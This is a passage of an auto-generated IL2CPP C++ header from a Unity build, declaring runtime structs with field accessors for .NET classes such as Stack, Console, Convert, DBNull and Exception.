__clang__ #pragma clang diagnostic pop #endif #endif // SORTEDLISTENUMERATOR_T0B3C08255F72412FF007E1CEBA45EEFAED17443E_H #ifndef STACK_T37723B68CC4FFD95F0F3D06A5D42D7DEE7569643_H #define STACK_T37723B68CC4FFD95F0F3D06A5D42D7DEE7569643_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Collections.Stack struct Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 : public RuntimeObject { public: // System.Object[] System.Collections.Stack::_array ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* ____array_0; // System.Int32 System.Collections.Stack::_size int32_t ____size_1; // System.Int32 System.Collections.Stack::_version int32_t ____version_2; // System.Object System.Collections.Stack::_syncRoot RuntimeObject * ____syncRoot_3; public: inline static int32_t get_offset_of__array_0() { return static_cast<int32_t>(offsetof(Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643, ____array_0)); } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* get__array_0() const { return ____array_0; } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A** get_address_of__array_0() { return &____array_0; } inline void set__array_0(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* value) { ____array_0 = value; Il2CppCodeGenWriteBarrier((&____array_0), value); } inline static int32_t get_offset_of__size_1() { return static_cast<int32_t>(offsetof(Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643, ____size_1)); } inline int32_t get__size_1() const { return ____size_1; } inline int32_t* get_address_of__size_1() { return &____size_1; } inline void set__size_1(int32_t value) { ____size_1 = value; } inline static int32_t get_offset_of__version_2() { return static_cast<int32_t>(offsetof(Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643, ____version_2)); } inline int32_t get__version_2() const { return ____version_2; } inline int32_t* get_address_of__version_2() { return &____version_2; } inline void set__version_2(int32_t value) { ____version_2 = value; } inline static int32_t get_offset_of__syncRoot_3() { return static_cast<int32_t>(offsetof(Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643, ____syncRoot_3)); } inline RuntimeObject * get__syncRoot_3() const { return ____syncRoot_3; } inline RuntimeObject ** get_address_of__syncRoot_3() { return &____syncRoot_3; } inline void set__syncRoot_3(RuntimeObject * value) { ____syncRoot_3 = value; Il2CppCodeGenWriteBarrier((&____syncRoot_3), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STACK_T37723B68CC4FFD95F0F3D06A5D42D7DEE7569643_H #ifndef STACKDEBUGVIEW_TE0C0C7F6AD6752160144359775846DFDDD36CB2E_H #define STACKDEBUGVIEW_TE0C0C7F6AD6752160144359775846DFDDD36CB2E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Collections.Stack/StackDebugView struct StackDebugView_tE0C0C7F6AD6752160144359775846DFDDD36CB2E : public RuntimeObject { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STACKDEBUGVIEW_TE0C0C7F6AD6752160144359775846DFDDD36CB2E_H #ifndef STACKENUMERATOR_TAD5D58C2B92BF36AB7BEDF4405635CB160515DDA_H #define STACKENUMERATOR_TAD5D58C2B92BF36AB7BEDF4405635CB160515DDA_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Collections.Stack/StackEnumerator struct StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA : public RuntimeObject { public: // System.Collections.Stack System.Collections.Stack/StackEnumerator::_stack Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * ____stack_0; // System.Int32 System.Collections.Stack/StackEnumerator::_index int32_t ____index_1; // System.Int32 System.Collections.Stack/StackEnumerator::_version int32_t ____version_2; // System.Object System.Collections.Stack/StackEnumerator::currentElement RuntimeObject * ___currentElement_3; public: inline static int32_t get_offset_of__stack_0() { return static_cast<int32_t>(offsetof(StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA, ____stack_0)); } inline Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * get__stack_0() const { return ____stack_0; } inline Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 ** get_address_of__stack_0() { return &____stack_0; } inline void set__stack_0(Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * value) { ____stack_0 = value; Il2CppCodeGenWriteBarrier((&____stack_0), value); } inline static int32_t get_offset_of__index_1() { return static_cast<int32_t>(offsetof(StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA, ____index_1)); } inline int32_t get__index_1() const { return ____index_1; } inline int32_t* get_address_of__index_1() { return &____index_1; } inline void set__index_1(int32_t value) { ____index_1 = value; } inline static int32_t get_offset_of__version_2() { return static_cast<int32_t>(offsetof(StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA, ____version_2)); } inline int32_t get__version_2() const { return ____version_2; } inline int32_t* get_address_of__version_2() { return &____version_2; } inline void set__version_2(int32_t value) { ____version_2 = value; } inline static int32_t get_offset_of_currentElement_3() { return static_cast<int32_t>(offsetof(StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA, ___currentElement_3)); } inline RuntimeObject * get_currentElement_3() const { return ___currentElement_3; } inline RuntimeObject ** get_address_of_currentElement_3() { return &___currentElement_3; } inline void set_currentElement_3(RuntimeObject * value) { ___currentElement_3 = value; Il2CppCodeGenWriteBarrier((&___currentElement_3), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STACKENUMERATOR_TAD5D58C2B92BF36AB7BEDF4405635CB160515DDA_H #ifndef COMPATIBILITYSWITCHES_TC541F9F5404925C97741A0628E9B6D26C40CFA91_H #define COMPATIBILITYSWITCHES_TC541F9F5404925C97741A0628E9B6D26C40CFA91_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.CompatibilitySwitches struct CompatibilitySwitches_tC541F9F5404925C97741A0628E9B6D26C40CFA91 : public RuntimeObject { public: public: }; struct CompatibilitySwitches_tC541F9F5404925C97741A0628E9B6D26C40CFA91_StaticFields { public: // System.Boolean System.CompatibilitySwitches::IsAppEarlierThanSilverlight4 bool ___IsAppEarlierThanSilverlight4_0; // System.Boolean System.CompatibilitySwitches::IsAppEarlierThanWindowsPhone8 bool ___IsAppEarlierThanWindowsPhone8_1; public: inline static int32_t get_offset_of_IsAppEarlierThanSilverlight4_0() { return static_cast<int32_t>(offsetof(CompatibilitySwitches_tC541F9F5404925C97741A0628E9B6D26C40CFA91_StaticFields, ___IsAppEarlierThanSilverlight4_0)); } inline bool get_IsAppEarlierThanSilverlight4_0() const { return ___IsAppEarlierThanSilverlight4_0; } inline bool* get_address_of_IsAppEarlierThanSilverlight4_0() { return &___IsAppEarlierThanSilverlight4_0; } inline void set_IsAppEarlierThanSilverlight4_0(bool value) { ___IsAppEarlierThanSilverlight4_0 = value; } inline static int32_t get_offset_of_IsAppEarlierThanWindowsPhone8_1() { return static_cast<int32_t>(offsetof(CompatibilitySwitches_tC541F9F5404925C97741A0628E9B6D26C40CFA91_StaticFields, ___IsAppEarlierThanWindowsPhone8_1)); } inline bool get_IsAppEarlierThanWindowsPhone8_1() const { return ___IsAppEarlierThanWindowsPhone8_1; } inline bool* get_address_of_IsAppEarlierThanWindowsPhone8_1() { return &___IsAppEarlierThanWindowsPhone8_1; } inline void set_IsAppEarlierThanWindowsPhone8_1(bool value) { ___IsAppEarlierThanWindowsPhone8_1 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // COMPATIBILITYSWITCHES_TC541F9F5404925C97741A0628E9B6D26C40CFA91_H #ifndef CONSOLE_T5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_H #define CONSOLE_T5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Console struct Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D : public RuntimeObject { public: public: }; struct Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields { public: // System.IO.TextWriter System.Console::stdout TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * ___stdout_0; // System.IO.TextWriter System.Console::stderr TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * ___stderr_1; // System.IO.TextReader System.Console::stdin TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * ___stdin_2; // System.Text.Encoding System.Console::inputEncoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___inputEncoding_3; // System.Text.Encoding System.Console::outputEncoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___outputEncoding_4; // System.ConsoleCancelEventHandler System.Console::cancel_event ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * ___cancel_event_5; // System.Console/InternalCancelHandler System.Console::cancel_handler InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * ___cancel_handler_6; public: inline static int32_t get_offset_of_stdout_0() { return static_cast<int32_t>(offsetof(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields, ___stdout_0)); } inline TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * get_stdout_0() const { return ___stdout_0; } inline TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 ** get_address_of_stdout_0() { return &___stdout_0; } inline void set_stdout_0(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * value) { ___stdout_0 = value; Il2CppCodeGenWriteBarrier((&___stdout_0), value); } inline static int32_t get_offset_of_stderr_1() { return static_cast<int32_t>(offsetof(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields, ___stderr_1)); } inline TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * get_stderr_1() const { return ___stderr_1; } inline TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 ** get_address_of_stderr_1() { return &___stderr_1; } inline void set_stderr_1(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * value) { ___stderr_1 = value; Il2CppCodeGenWriteBarrier((&___stderr_1), value); } inline static int32_t get_offset_of_stdin_2() { return static_cast<int32_t>(offsetof(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields, ___stdin_2)); } inline TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * get_stdin_2() const { return ___stdin_2; } inline TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A ** get_address_of_stdin_2() { return &___stdin_2; } inline void set_stdin_2(TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * value) { ___stdin_2 = value; Il2CppCodeGenWriteBarrier((&___stdin_2), value); } inline static int32_t get_offset_of_inputEncoding_3() { return static_cast<int32_t>(offsetof(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields, ___inputEncoding_3)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_inputEncoding_3() const { return ___inputEncoding_3; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_inputEncoding_3() { return &___inputEncoding_3; } inline void set_inputEncoding_3(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___inputEncoding_3 = value; Il2CppCodeGenWriteBarrier((&___inputEncoding_3), value); } inline static int32_t get_offset_of_outputEncoding_4() { return static_cast<int32_t>(offsetof(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields, ___outputEncoding_4)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_outputEncoding_4() const { return ___outputEncoding_4; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_outputEncoding_4() { return &___outputEncoding_4; } inline void set_outputEncoding_4(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___outputEncoding_4 = value; Il2CppCodeGenWriteBarrier((&___outputEncoding_4), value); } inline static int32_t get_offset_of_cancel_event_5() { return static_cast<int32_t>(offsetof(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields, ___cancel_event_5)); } inline ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * get_cancel_event_5() const { return ___cancel_event_5; } inline ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 ** get_address_of_cancel_event_5() { return &___cancel_event_5; } inline void set_cancel_event_5(ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * value) { ___cancel_event_5 = value; Il2CppCodeGenWriteBarrier((&___cancel_event_5), value); } inline static int32_t get_offset_of_cancel_handler_6() { return static_cast<int32_t>(offsetof(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields, ___cancel_handler_6)); } inline InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * get_cancel_handler_6() const { return ___cancel_handler_6; } inline InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A ** get_address_of_cancel_handler_6() { return &___cancel_handler_6; } inline void set_cancel_handler_6(InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * value) { ___cancel_handler_6 = value; Il2CppCodeGenWriteBarrier((&___cancel_handler_6), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONSOLE_T5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_H #ifndef WINDOWSCONSOLE_TE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_H #define WINDOWSCONSOLE_TE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Console/WindowsConsole struct WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B : public RuntimeObject { public: public: }; struct WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_StaticFields { public: // System.Boolean System.Console/WindowsConsole::ctrlHandlerAdded bool ___ctrlHandlerAdded_0; // System.Console/WindowsConsole/WindowsCancelHandler System.Console/WindowsConsole::cancelHandler WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * ___cancelHandler_1; public: inline static int32_t get_offset_of_ctrlHandlerAdded_0() { return static_cast<int32_t>(offsetof(WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_StaticFields, ___ctrlHandlerAdded_0)); } inline bool get_ctrlHandlerAdded_0() const { return ___ctrlHandlerAdded_0; } inline bool* get_address_of_ctrlHandlerAdded_0() { return &___ctrlHandlerAdded_0; } inline void set_ctrlHandlerAdded_0(bool value) { ___ctrlHandlerAdded_0 = value; } inline static int32_t get_offset_of_cancelHandler_1() { return static_cast<int32_t>(offsetof(WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_StaticFields, ___cancelHandler_1)); } inline WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * get_cancelHandler_1() const { return ___cancelHandler_1; } inline WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 ** get_address_of_cancelHandler_1() { return &___cancelHandler_1; } inline void set_cancelHandler_1(WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * value) { ___cancelHandler_1 = value; Il2CppCodeGenWriteBarrier((&___cancelHandler_1), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // WINDOWSCONSOLE_TE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_H #ifndef CONSOLEDRIVER_T4F24DB42600CA82912181D5D312902B8BEFEE101_H #define CONSOLEDRIVER_T4F24DB42600CA82912181D5D312902B8BEFEE101_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ConsoleDriver struct ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101 : public RuntimeObject { public: public: }; struct ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields { public: // System.IConsoleDriver System.ConsoleDriver::driver RuntimeObject* ___driver_0; // System.Boolean System.ConsoleDriver::is_console bool ___is_console_1; // System.Boolean System.ConsoleDriver::called_isatty bool ___called_isatty_2; public: inline static int32_t get_offset_of_driver_0() { return static_cast<int32_t>(offsetof(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields, ___driver_0)); } inline RuntimeObject* get_driver_0() const { return ___driver_0; } inline RuntimeObject** get_address_of_driver_0() { return &___driver_0; } inline void set_driver_0(RuntimeObject* value) { ___driver_0 = value; Il2CppCodeGenWriteBarrier((&___driver_0), value); } inline static int32_t get_offset_of_is_console_1() { return static_cast<int32_t>(offsetof(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields, ___is_console_1)); } inline bool get_is_console_1() const { return ___is_console_1; } inline bool* get_address_of_is_console_1() { return &___is_console_1; } inline void set_is_console_1(bool value) { ___is_console_1 = value; } inline static int32_t get_offset_of_called_isatty_2() { return static_cast<int32_t>(offsetof(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields, ___called_isatty_2)); } inline bool get_called_isatty_2() const { return ___called_isatty_2; } inline bool* get_address_of_called_isatty_2() { return &___called_isatty_2; } inline void set_called_isatty_2(bool value) { ___called_isatty_2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONSOLEDRIVER_T4F24DB42600CA82912181D5D312902B8BEFEE101_H #ifndef CONVERT_T1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_H #define CONVERT_T1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Convert struct Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E : public RuntimeObject { public: public: }; struct Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields { public: // System.RuntimeType[] System.Convert::ConvertTypes RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* ___ConvertTypes_0; // System.RuntimeType System.Convert::EnumType RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___EnumType_1; // System.Char[] System.Convert::base64Table CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___base64Table_2; // System.Object System.Convert::DBNull RuntimeObject * ___DBNull_3; public: inline static int32_t get_offset_of_ConvertTypes_0() { return static_cast<int32_t>(offsetof(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields, ___ConvertTypes_0)); } inline RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* get_ConvertTypes_0() const { return ___ConvertTypes_0; } inline RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE** get_address_of_ConvertTypes_0() { return &___ConvertTypes_0; } inline void set_ConvertTypes_0(RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* value) { ___ConvertTypes_0 = value; Il2CppCodeGenWriteBarrier((&___ConvertTypes_0), value); } inline static int32_t get_offset_of_EnumType_1() { return static_cast<int32_t>(offsetof(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields, ___EnumType_1)); } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * get_EnumType_1() const { return ___EnumType_1; } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F ** get_address_of_EnumType_1() { return &___EnumType_1; } inline void set_EnumType_1(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * value) { ___EnumType_1 = value; Il2CppCodeGenWriteBarrier((&___EnumType_1), value); } inline static int32_t get_offset_of_base64Table_2() { return static_cast<int32_t>(offsetof(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields, ___base64Table_2)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_base64Table_2() const { return ___base64Table_2; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_base64Table_2() { return &___base64Table_2; } inline void set_base64Table_2(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___base64Table_2 = value; Il2CppCodeGenWriteBarrier((&___base64Table_2), value); } inline static int32_t get_offset_of_DBNull_3() { return static_cast<int32_t>(offsetof(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields, ___DBNull_3)); } inline RuntimeObject * get_DBNull_3() const { return ___DBNull_3; } inline RuntimeObject ** get_address_of_DBNull_3() { return &___DBNull_3; } inline void set_DBNull_3(RuntimeObject * value) { ___DBNull_3 = value; Il2CppCodeGenWriteBarrier((&___DBNull_3), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONVERT_T1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_H #ifndef DBNULL_T7400E04939C2C29699B389B106997892BF53A8E5_H #define DBNULL_T7400E04939C2C29699B389B106997892BF53A8E5_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DBNull struct DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 : public RuntimeObject { public: public: }; struct DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_StaticFields { public: // System.DBNull System.DBNull::Value DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * ___Value_0; public: inline static int32_t get_offset_of_Value_0() { return static_cast<int32_t>(offsetof(DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_StaticFields, ___Value_0)); } inline DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * get_Value_0() const { return ___Value_0; } inline DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 ** get_address_of_Value_0() { return &___Value_0; } inline void set_Value_0(DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * value) { ___Value_0 = value; Il2CppCodeGenWriteBarrier((&___Value_0), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DBNULL_T7400E04939C2C29699B389B106997892BF53A8E5_H #ifndef DATETIMEPARSE_T657E38D9FF27E5FD6A33E23887031A86248D97D4_H #define DATETIMEPARSE_T657E38D9FF27E5FD6A33E23887031A86248D97D4_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeParse struct DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4 : public RuntimeObject { public: public: }; struct DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields { public: // System.DateTimeParse/MatchNumberDelegate System.DateTimeParse::m_hebrewNumberParser MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * ___m_hebrewNumberParser_0; // System.DateTimeParse/DS[][] System.DateTimeParse::dateParsingStates DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* ___dateParsingStates_1; public: inline static int32_t get_offset_of_m_hebrewNumberParser_0() { return static_cast<int32_t>(offsetof(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields, ___m_hebrewNumberParser_0)); } inline MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * get_m_hebrewNumberParser_0() const { return ___m_hebrewNumberParser_0; } inline MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D ** get_address_of_m_hebrewNumberParser_0() { return &___m_hebrewNumberParser_0; } inline void set_m_hebrewNumberParser_0(MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * value) { ___m_hebrewNumberParser_0 = value; Il2CppCodeGenWriteBarrier((&___m_hebrewNumberParser_0), value); } inline static int32_t get_offset_of_dateParsingStates_1() { return static_cast<int32_t>(offsetof(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields, ___dateParsingStates_1)); } inline DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* get_dateParsingStates_1() const { return ___dateParsingStates_1; } inline DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1** get_address_of_dateParsingStates_1() { return &___dateParsingStates_1; } inline void set_dateParsingStates_1(DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* value) { ___dateParsingStates_1 = value; Il2CppCodeGenWriteBarrier((&___dateParsingStates_1), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DATETIMEPARSE_T657E38D9FF27E5FD6A33E23887031A86248D97D4_H #ifndef EVENTARGS_T8E6CA180BE0E56674C6407011A94BAF7C757352E_H #define EVENTARGS_T8E6CA180BE0E56674C6407011A94BAF7C757352E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.EventArgs struct EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E : public RuntimeObject { public: public: }; struct EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E_StaticFields { public: // System.EventArgs System.EventArgs::Empty EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E * ___Empty_0; public: inline static int32_t get_offset_of_Empty_0() { return static_cast<int32_t>(offsetof(EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E_StaticFields, ___Empty_0)); } inline EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E * get_Empty_0() const { return ___Empty_0; } inline EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E ** get_address_of_Empty_0() { return &___Empty_0; } inline void set_Empty_0(EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E * value) { ___Empty_0 = value; Il2CppCodeGenWriteBarrier((&___Empty_0), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // EVENTARGS_T8E6CA180BE0E56674C6407011A94BAF7C757352E_H #ifndef EXCEPTION_T_H #define EXCEPTION_T_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Exception struct Exception_t : public RuntimeObject { public: // System.String System.Exception::_className String_t* ____className_1; // System.String System.Exception::_message String_t* ____message_2; // System.Collections.IDictionary System.Exception::_data RuntimeObject* ____data_3; // System.Exception System.Exception::_innerException Exception_t * ____innerException_4; // System.String System.Exception::_helpURL String_t* ____helpURL_5; // System.Object System.Exception::_stackTrace RuntimeObject * ____stackTrace_6; // System.String System.Exception::_stackTraceString String_t* ____stackTraceString_7; // System.String System.Exception::_remoteStackTraceString String_t* ____remoteStackTraceString_8; // System.Int32 System.Exception::_remoteStackIndex int32_t ____remoteStackIndex_9; // System.Object System.Exception::_dynamicMethods RuntimeObject * ____dynamicMethods_10; // System.Int32 System.Exception::_HResult int32_t ____HResult_11; // System.String System.Exception::_source String_t* ____source_12; // System.Runtime.Serialization.SafeSerializationManager System.Exception::_safeSerializationManager SafeSerializationManager_t4A754D86B0F784B18CBC36C073BA564BED109770 * ____safeSerializationManager_13; // System.Diagnostics.StackTrace[] System.Exception::captured_traces StackTraceU5BU5D_t855F09649EA34DEE7C1B6F088E0538E3CCC3F196* ___captured_traces_14; // System.IntPtr[] System.Exception::native_trace_ips IntPtrU5BU5D_t4DC01DCB9A6DF6C9792A6513595D7A11E637DCDD* ___native_trace_ips_15; public: inline static int32_t get_offset_of__className_1() { return static_cast<int32_t>(offsetof(Exception_t, ____className_1)); } inline String_t* get__className_1() const { return ____className_1; } inline String_t** get_address_of__className_1() { return &____className_1; } inline void set__className_1(String_t* value) { ____className_1 = value; Il2CppCodeGenWriteBarrier((&____className_1), value); } inline static int32_t get_offset_of__message_2() { return static_cast<int32_t>(offsetof(Exception_t, ____message_2)); } inline String_t* get__message_2() const { return ____message_2; } inline String_t** get_address_of__message_2() { return &____message_2; } inline void set__message_2(String_t* value) { ____message_2 = value; Il2CppCodeGenWriteBarrier((&____message_2), value); } inline static int32_t get_offset_of__data_3() { return static_cast<int32_t>(offsetof(Exception_t, ____data_3)); } inline RuntimeObject* get__data_3() const { return ____data_3; } inline RuntimeObject** get_address_of__data_3() { return &____data_3; } inline void set__data_3(RuntimeObject* value) { ____data_3 = value; Il2CppCodeGenWriteBarrier((&____data_3), value); } inline static int32_t get_offset_of__innerException_4() { return static_cast<int32_t>(offsetof(Exception_t, ____innerException_4)); } inline Exception_t * get__innerException_4() 